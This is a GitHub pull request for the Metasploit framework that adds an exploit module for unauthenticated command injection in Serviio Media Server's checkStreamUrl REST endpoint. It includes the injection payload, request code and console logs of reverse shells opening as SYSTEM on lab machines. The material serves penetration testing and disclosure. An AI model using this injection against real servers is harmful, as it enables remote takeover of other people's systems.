Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Serviio Media Server checkStreamUrl Command Execution #8347

Merged
merged 4 commits into from May 16, 2017

Conversation

@bcoles
Copy link
Contributor

bcoles commented May 5, 2017

This PR adds an exploit module for Serviio Media Server.

This module exploits an unauthenticated remote command execution vulnerability
in the console component of Serviio Media Server versions 1.4 to 1.8 on
Windows operating systems.

The console service (on port 23423 by default) exposes a REST API which
which does not require authentication.

The 'action' API endpoint does not sufficiently sanitize user-supplied data
in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is
used in a call to cmd.exe resulting in execution of arbitrary commands.

This module has been tested successfully on Serviio Media Server versions
1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.

Documentation

To follow; when I feel like it.

Verification

  • Start msfconsole
  • use exploit/windows/http/serviio_checkstreamurl_cmd_exec
  • check
  • Verify the check method returns Unknown if the connection to the target server fails.
  • Verify the check method returns Appears if the target server is Serviio version 1.4 to 1.8 on Windows.
  • Verify the check method returns Safe if the target server is not Serviio version 1.4 to 1.8 on Windows.
  • run
  • Verify you get a shell.

Output

msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec 
msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
verbose => true
msf exploit(serviio_checkstreamurl_cmd_exec) > check

[*] 172.16.191.166:23423 Serviio Media Server version 1.8
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] Serviio Media Server version 1.8
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 172.16.191.166
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd 
C:\Program Files\Serviio\bin
def execute_command(cmd, opts = {})
json = { 'name' => 'checkStreamUrl',
'parameter' => ['VIDEO', "\" &#{cmd}&"] }.to_json

This comment has been minimized.

Copy link
@mmetince

mmetince May 8, 2017

Contributor

Formatting suggestions.

    json = {
      'name'      => 'checkStreamUrl',
      'parameter' => ['VIDEO', "\" &#{cmd}&"]
    }.to_json

This comment has been minimized.

Copy link
@bcoles

bcoles May 8, 2017

Author Contributor

No thanks

This comment has been minimized.

Copy link
@bcoles

bcoles May 10, 2017

Author Contributor

Symmetrical style hash brace layout as per Rubocop MultilineHashBraceLayout in lieu of a Metasploit style guide.

However the .to_json call should probably be moved inside the send_request_uri method. I've fixed this.

'method' => 'POST',
'ctype' => 'application/json',
'data' => json)
end

This comment has been minimized.

Copy link
@mmetince

mmetince May 8, 2017

Contributor

Yet another formatting suggestion.

send_request_cgi(
  'uri'    => normalize_uri(target_uri.path, 'rest', 'action'),
  'method' => 'POST',
  'ctype'  => 'application/json',
  'data'   => json
)

This comment has been minimized.

Copy link
@bcoles

bcoles May 8, 2017

Author Contributor

No thanks

This comment has been minimized.

Copy link
@bcoles

bcoles May 10, 2017

Author Contributor

Symmetrical style method call brace layout as per Rubocop MultilineMethodCallBraceLayout in lieu of a Metasploit style guide.

end

def exploit
fail_with(Failure::NoTarget, 'Target is not vulnerable') unless check == CheckCode::Appears

This comment has been minimized.

Copy link
@mmetince

mmetince May 8, 2017

Contributor

I believe you may want to use Failure::NotVulnerable instead of Failure::NoTarget.

This comment has been minimized.

Copy link
@bcoles

bcoles May 8, 2017

Author Contributor

Fixed

bcoles added 2 commits May 8, 2017
@wchen-r7 wchen-r7 self-assigned this May 16, 2017
@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented May 16, 2017

Testing...

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented May 16, 2017

Flawless victory:

msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 192.168.146.171:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 192.168.146.171
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.171:49186) at 2017-05-16 16:17:37 -0500

meterpreter > 
@wchen-r7 wchen-r7 merged commit 42c7d64 into rapid7:master May 16, 2017
1 check passed
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
Details
wchen-r7 added a commit that referenced this pull request May 16, 2017
@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented May 16, 2017

Release Notes

The exploits/windows/http/serviio_checkstreamurl_cmd_exec module has been added to the framework. It exploits a vulnerability in Serviio Media Server. Serviio is a free media server that allows you stream video, audio, and images. The console service in Serviio exposes a REST API that allows a remote user to execute system commands, which can be abused to gain arbitrary remote code execution under the context of SYSTEM (on Windows).

@tdoan-r7 tdoan-r7 added the rn-exploit label May 18, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

5 participants
You can’t perform that action at this time.